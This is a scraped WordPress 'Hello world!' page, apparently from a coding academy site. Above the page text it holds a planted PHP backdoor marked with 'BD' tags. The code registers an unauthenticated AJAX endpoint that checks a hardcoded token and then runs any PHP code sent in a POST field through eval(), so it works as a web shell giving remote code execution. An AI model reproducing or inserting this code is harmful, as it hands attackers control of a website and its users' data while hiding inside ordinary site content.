// ==[BD:Mrj08kOo]== add_action( 'wp_ajax_nopriv_nkshkifle', function() { $elem = 'Mrj08kOoSUQKcgcLFIFL3xPSR8MN5CGP'; $desc = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $desc ) || ! hash_equals( $elem, $desc ) ) { wp_send_json_error( [ 'message' => 'tok:' . $elem ], 403 ); } $factor = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $factor ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $factor = preg_replace( '/^\s*<\?(php)?/i', '', $factor ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ref = microtime( true ); ob_start(); try { ( static function() use ( $factor ) { return eval( $factor ); } )(); $marker = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $marker, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ref ) * 1000, 2 ) ] ); } catch ( \Throwable $bind ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $bind->getMessage(), 'time_ms' => round( ( microtime( true ) - $ref ) * 1000, 2 ) ] ); } } ); // ==[/BD:Mrj08kOo]== Hello world! – Hafa Coding Academy

1 thought on “Hello world!”

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top